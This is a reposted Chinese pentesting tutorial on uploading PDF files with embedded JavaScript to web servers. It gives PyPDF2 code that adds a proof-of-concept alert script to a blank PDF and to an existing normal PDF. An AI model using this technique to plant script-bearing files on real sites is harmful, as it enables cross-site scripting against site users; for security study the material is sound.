在
web渗透测试中,我们最常用的是通过各种花样上传图片马或者shell文件,但是这种方式已越来越不适用了。换而言之,除了上传图片这一切入点,我们还能上传什么呢?没错,那就是pdf文件。那如何在PDF文件中插入恶意XSS代码呢?
注意:本文仅供学习和研究网络安全技术。反对一切危害网络安全的行为。造成法律后果自行负责。
首先我们需要安装python中相应的模块,执行下面命令进行安装。
pip install PyPDF2
生成pdf
接着,我们利用python创建一个含有XSS的PDF文件。
from PyPDF2 import PdfReader, PdfWriter
# 创建一个新的 PDF 文档
output_pdf = PdfWriter()
# 添加一个新页面
page = output_pdf.add_blank_page(width=72, height=72)
# 添加js代码
output_pdf.add_js("app.alert('欢迎关注微信公众号 kali黑客笔记');")
# 将新页面写入到新 PDF 文档中
with open("xss.pdf", "wb") as f:
output_pdf.write(f)
接着,将上诉代码保存为py文件。并运行。这时会在桌面生成一个xss.pdf的文件。我们需要将其放到web服务器根目录,或者通过上传的形式上传到服务器。
cp xss.pdf /var/www/html
service apache2 start
然后访问web服务下的该文件。如bbskali.cn/xss.pdf
和正常PDF绑定
我们可以利用Word等工具生成一个常见的PDF文件。利用下面代码进行写入
from PyPDF2 import PdfReader, PdfWriter
# 打开原始 22.PDF 文件
input_pdf = PdfReader("22.pdf")
# 创建一个新的 PDF 文档
output_pdf = PdfWriter()
# 将现有的 PDF 页面复制到新文档
for i in range(len(input_pdf.pages)):
output_pdf.add_page(input_pdf.pages[i])
# 添加 JavaScript 代码
output_pdf.add_js("app.alert('欢迎关注微信公众号 kali黑客笔记');")
# 将新 PDF 文档写入到文件中
with open("xss6.pdf", "wb") as f:
output_pdf.write(f)
执行效果如下
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):文件上传之给PDF文件插入XSS
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/151955.html
